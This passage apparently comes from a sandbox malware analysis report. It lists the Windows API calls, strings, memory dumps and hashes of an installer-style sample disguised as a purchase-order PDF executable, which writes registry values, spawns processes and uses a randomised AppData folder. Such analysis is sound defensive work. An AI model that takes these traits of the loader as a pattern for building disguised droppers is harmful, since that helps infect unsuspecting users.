                                    • SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user\AppData\Local\Vandskellenes\Tramp\drejebnksvrktjets\Intervisibility,00000000,00000000,000000F0), ref: 0040163C
                                    Strings
                                    • C:\Users\user\AppData\Local\Vandskellenes\Tramp\drejebnksvrktjets\Intervisibility, xrefs: 00401631
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2289964001.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.2289938819.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2289985883.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290459111.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_P.jbxd
                                    Similarity
                                    • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                    • String ID: C:\Users\user\AppData\Local\Vandskellenes\Tramp\drejebnksvrktjets\Intervisibility
                                    • API String ID: 1892508949-2092128197
                                    • Opcode ID: 44bd3ee4d2333abb283e6e1530d5ccc6971a273d5344301db9a406d74faed733
                                    • Instruction ID: 89ad01db463442aa800da85bb51449bf5fbab0d3eae07559ae4194fd3409cb5d
                                    • Opcode Fuzzy Hash: 44bd3ee4d2333abb283e6e1530d5ccc6971a273d5344301db9a406d74faed733
                                    • Instruction Fuzzy Hash: 05110831604051DBCF307FA54D409BF37B4DE92725B28067FE491B22D3DA3D49426A2E
                                    APIs
                                    • RegQueryValueExA.KERNELBASE(?,?,00000000,?,?,00000400,: Completed,?,?,?,?,00000002,: Completed,?,0040625D,80000002), ref: 00405FEE
                                    • RegCloseKey.KERNELBASE(?,?,0040625D,80000002,Software\Microsoft\Windows\CurrentVersion,: Completed,: Completed,: Completed,?,Completed), ref: 00405FF9
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2289964001.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.2289938819.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2289985883.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290459111.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_P.jbxd
                                    Similarity
                                    • API ID: CloseQueryValue
                                    • String ID: : Completed
                                    • API String ID: 3356406503-2954849223
                                    • Opcode ID: 4cc92a42e5629c7bbcd5378a5bb523b692adcb537e29c9598c16d659ab369d15
                                    • Instruction ID: bc2ee3056b47e5ed157b0296f64e65c5d928d18fe46a96bfb4a95e0d5f896fcd
                                    • Opcode Fuzzy Hash: 4cc92a42e5629c7bbcd5378a5bb523b692adcb537e29c9598c16d659ab369d15
                                    • Instruction Fuzzy Hash: C7015A72540209AADF22CF61CC09FDB3BA8EF95364F01403AF955A6190D778D964DFA4
                                    APIs
                                    • CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00422530,Error launching installer), ref: 00405789
                                    • CloseHandle.KERNEL32(?), ref: 00405796
                                    Strings
                                    • Error launching installer, xrefs: 00405773
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2289964001.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.2289938819.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2289985883.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290459111.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_P.jbxd
                                    Similarity
                                    • API ID: CloseCreateHandleProcess
                                    • String ID: Error launching installer
                                    • API String ID: 3712363035-66219284
                                    • Opcode ID: c3c80266f92bd9d667c92bf3182b136ee7f32a01548fe2ad44771ad24a16863f
                                    • Instruction ID: 07a2ea870b6c965c9c8bd0de01314bb8301d1462abb1d5e573899e5cf6f1fbe8
                                    • Opcode Fuzzy Hash: c3c80266f92bd9d667c92bf3182b136ee7f32a01548fe2ad44771ad24a16863f
                                    • Instruction Fuzzy Hash: EEE04FB0A00309BFEB009B60ED45F7B77ACEB04204F408421BD44F2150E77498148A78
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2289964001.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.2289938819.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2289985883.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290459111.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_P.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 126d375e0cd8dd3c96d9f56c9c2b4ea3570e5546f357d91bfce8ff404d349699
                                    • Instruction ID: 2508fafb39113fa530b835c7ee7350b0f579aeff726ee83cf5aef614fa8a9c48
                                    • Opcode Fuzzy Hash: 126d375e0cd8dd3c96d9f56c9c2b4ea3570e5546f357d91bfce8ff404d349699
                                    • Instruction Fuzzy Hash: A3A14271E00229CBDB28CFA8C8547ADBBB1FF44305F15816AD856BB281C7786A96DF44
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2289964001.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.2289938819.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2289985883.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290459111.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_P.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 7d0c270478a2f9a3adf3a01af42e260dfbb4be2f4416bec3860fa0cf1f45473d
                                    • Instruction ID: f0f32deb93356653934a7f7f8ad788a679267befe7528616fd809e2a8ddaf9c6
                                    • Opcode Fuzzy Hash: 7d0c270478a2f9a3adf3a01af42e260dfbb4be2f4416bec3860fa0cf1f45473d
                                    • Instruction Fuzzy Hash: C8913070D00229CBDF28CF98C854BADBBB1FF44305F15816AD856BB281C779AA96DF44
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2289964001.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.2289938819.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2289985883.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290459111.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_P.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 79859cd80aa4a68261cc067353b3b3a3bb11021b997dedf9f01a815f4beecf4f
                                    • Instruction ID: e43b34c51a548f07c4fb140720fe79cc87a03685924cd857d2d075badb14d917
                                    • Opcode Fuzzy Hash: 79859cd80aa4a68261cc067353b3b3a3bb11021b997dedf9f01a815f4beecf4f
                                    • Instruction Fuzzy Hash: 2F815371D04229CBDF24CFA8C8847ADBBB1FB44305F25816AD456BB281C738AA96DF05
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2289964001.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.2289938819.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2289985883.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290459111.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_P.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 51f3059c0ab10d0f6eca9bda3b9c7ef9d62a7fb15769fd34cf569834d4f38521
                                    • Instruction ID: 30cc61a65d8e7361f2687543d4853da4ee9de610700e1b42b944a6768b2f9653
                                    • Opcode Fuzzy Hash: 51f3059c0ab10d0f6eca9bda3b9c7ef9d62a7fb15769fd34cf569834d4f38521
                                    • Instruction Fuzzy Hash: D4817771D04229CBDF24CFA9C8447AEBBB0FF44305F21816AD856BB281C7796A86DF45
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2289964001.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.2289938819.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2289985883.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290459111.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_P.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: ae4b4001fee964b3ec39fcc62e642dbd1d089b63cfe1c3a3d4f330af07c9f72e
                                    • Instruction ID: 0ea1ed3bc64708edefeb163875b4580728164d017b9a5fabf4c3c9e69b53418c
                                    • Opcode Fuzzy Hash: ae4b4001fee964b3ec39fcc62e642dbd1d089b63cfe1c3a3d4f330af07c9f72e
                                    • Instruction Fuzzy Hash: 96712371D00229CBDF24CF98C854BADBBB1FF48305F15816AD856B7281C7395A96DF44
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2289964001.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.2289938819.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2289985883.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290459111.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_P.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 46e38dc9042d38c3d36f7f10ec43a7b3aa55cd06347f931a7d3c587032d94121
                                    • Instruction ID: f909a51a05dfa9c5f202b5373a38b9e5f11f80519cee44c22f430a43d8e85a48
                                    • Opcode Fuzzy Hash: 46e38dc9042d38c3d36f7f10ec43a7b3aa55cd06347f931a7d3c587032d94121
                                    • Instruction Fuzzy Hash: 74713371E00229CBDF28CF98C844BADBBB1FF44305F15816AD856BB281C7796A96DF44
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2289964001.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.2289938819.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2289985883.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290459111.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_P.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 0acf286bb029991ed8d3626521cf090d2a7bfbfd73cbce5b83777d77729d6ca6
                                    • Instruction ID: 8ba59c5cd0d20fcb356abc66f065f0fd9b5ab0142fa9d7a08340707df7706276
                                    • Opcode Fuzzy Hash: 0acf286bb029991ed8d3626521cf090d2a7bfbfd73cbce5b83777d77729d6ca6
                                    • Instruction Fuzzy Hash: 2A715571D00229CBDF28CF98C844BADBBB1FF44305F15816AD856B7281C779AA96DF44
                                    APIs
                                    • lstrlenA.KERNEL32(0040AC08,00000023,00000011,00000002), ref: 004024C1
                                    • RegSetValueExA.ADVAPI32(?,?,?,?,0040AC08,00000000,00000011,00000002), ref: 00402501
                                    • RegCloseKey.ADVAPI32(?,?,?,0040AC08,00000000,00000011,00000002), ref: 004025E5
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2289964001.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.2289938819.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2289985883.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290459111.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_P.jbxd
                                    Similarity
                                    • API ID: CloseValuelstrlen
                                    • String ID:
                                    • API String ID: 2655323295-0
                                    • Opcode ID: 299bb2b355885705dcbf208d5ef5427df63eba9731992c9a0cd90d06c5ef65b5
                                    • Instruction ID: f8ac89c5eddf20255a64599a8c35fdda00ac4070600c31cba318713478050a06
                                    • Opcode Fuzzy Hash: 299bb2b355885705dcbf208d5ef5427df63eba9731992c9a0cd90d06c5ef65b5
                                    • Instruction Fuzzy Hash: A311B171E00214AFEF10AFA5CE49EAE7A74EB40314F21803AF505F71C1C6B89D419B28
                                    APIs
                                    • RegEnumKeyA.ADVAPI32(00000000,00000000,?,000003FF), ref: 004025BA
                                    • RegEnumValueA.ADVAPI32(00000000,00000000,?,?), ref: 004025CD
                                    • RegCloseKey.ADVAPI32(?,?,?,0040AC08,00000000,00000011,00000002), ref: 004025E5
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2289964001.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.2289938819.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2289985883.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290459111.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_P.jbxd
                                    Similarity
                                    • API ID: Enum$CloseValue
                                    • String ID:
                                    • API String ID: 397863658-0
                                    • Opcode ID: c9a77c2b1b56a11624b6571467a1d3d53d4aa159f7e68171bb3b056e365f73fd
                                    • Instruction ID: 8bc688a29f0920165d59b4cbe52957f089062dbf188599c99d2d09d2baf6e481
                                    • Opcode Fuzzy Hash: c9a77c2b1b56a11624b6571467a1d3d53d4aa159f7e68171bb3b056e365f73fd
                                    • Instruction Fuzzy Hash: 7F018F71604204FFE7219F54DE99ABF7ABCEF40359F20403EF505B61C0DAB84E419629
                                    APIs
                                    • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                    • SendMessageA.USER32(?,00000402,00000000), ref: 004013F4
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2289964001.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.2289938819.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2289985883.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290459111.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_P.jbxd
                                    Similarity
                                    • API ID: MessageSend
                                    • String ID:
                                    • API String ID: 3850602802-0
                                    • Opcode ID: 1fe9c1000dbda7a9d39110f4f9bff940efbdf01e75595cec207c4de3ebb5c286
                                    • Instruction ID: 30547d814f52c0c9fa729df1a4499858ceafdecff29ed48dfb424bf33c152dfa
                                    • Opcode Fuzzy Hash: 1fe9c1000dbda7a9d39110f4f9bff940efbdf01e75595cec207c4de3ebb5c286
                                    • Instruction Fuzzy Hash: 3401D131B242109BE7194B389E05B2A36A8E710315F51823AB951F65F1D778CC129B4C
                                    APIs
                                    • RegDeleteValueA.ADVAPI32(00000000,00000000,00000033), ref: 00402442
                                    • RegCloseKey.ADVAPI32(00000000), ref: 0040244B
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2289964001.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.2289938819.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2289985883.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290459111.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_P.jbxd
                                    Similarity
                                    • API ID: CloseDeleteValue
                                    • String ID:
                                    • API String ID: 2831762973-0
                                    • Opcode ID: c2e41f8bc962ba606dfa1a83ad2bf3ada334d44b932b2190b256f03bcdf0d5b8
                                    • Instruction ID: e0febeaf572c958115365c956167c8050d7e7dc612328462eeda311075ff2656
                                    • Opcode Fuzzy Hash: c2e41f8bc962ba606dfa1a83ad2bf3ada334d44b932b2190b256f03bcdf0d5b8
                                    • Instruction Fuzzy Hash: 66F09C32600111DBD7107FA49B4D66E72A5DB40315F25453FF601B71C1D9F84D42466E
                                    APIs
                                    • GetModuleHandleA.KERNEL32(?,?,?,00403385,0000000B), ref: 004064DC
                                    • GetProcAddress.KERNEL32(00000000,?), ref: 004064F7
                                      • Part of subcall function 0040645C: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00406473
                                      • Part of subcall function 0040645C: wsprintfA.USER32 ref: 004064AC
                                      • Part of subcall function 0040645C: LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 004064C0
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2289964001.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.2289938819.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2289985883.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290459111.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_P.jbxd
                                    Similarity
                                    • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                    • String ID:
                                    • API String ID: 2547128583-0
                                    • Opcode ID: 86a36fe79f27c55ffb4f68e9eb19a7d4fc21bb30cdd0e1b9c8c3d4c34093b0ac
                                    • Instruction ID: b1d6ada99e6651afe610309d4c68ede8e1123b1e5f34d771ce11ce336b0a7369
                                    • Opcode Fuzzy Hash: 86a36fe79f27c55ffb4f68e9eb19a7d4fc21bb30cdd0e1b9c8c3d4c34093b0ac
                                    • Instruction Fuzzy Hash: 1AE086326042116BD21067705E0893B72A89E84700302443EF946F2144DB39EC35A76D
                                    APIs
                                    • GetFileAttributesA.KERNELBASE(00000003,00402EE1,C:\Users\user\Desktop\P.O_Qouts_t87E90Y-E4R7G-PDF.exe,80000000,00000003), ref: 00405C5E
                                    • CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405C80
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2289964001.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.2289938819.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2289985883.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290459111.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_P.jbxd
                                    Similarity
                                    • API ID: File$AttributesCreate
                                    • String ID:
                                    • API String ID: 415043291-0
                                    • Opcode ID: 495096ec3bada98d59396949f3e5d8db788c55d9a14f95543a77051fd5c04aa8
                                    • Instruction ID: ee59d6d0e1d409ab4f08bbdf592326cff3c7222ef74ae4255e7f212f1854b30f
                                    • Opcode Fuzzy Hash: 495096ec3bada98d59396949f3e5d8db788c55d9a14f95543a77051fd5c04aa8
                                    • Instruction Fuzzy Hash: F5D09E31654201AFEF0D8F20DE16F2E7AA2EB84B00F11952CB782941E1DA715819AB19
                                    APIs
                                    • GetFileAttributesA.KERNELBASE(?,?,0040584D,?,?,00000000,00405A30,?,?,?,?), ref: 00405C3A
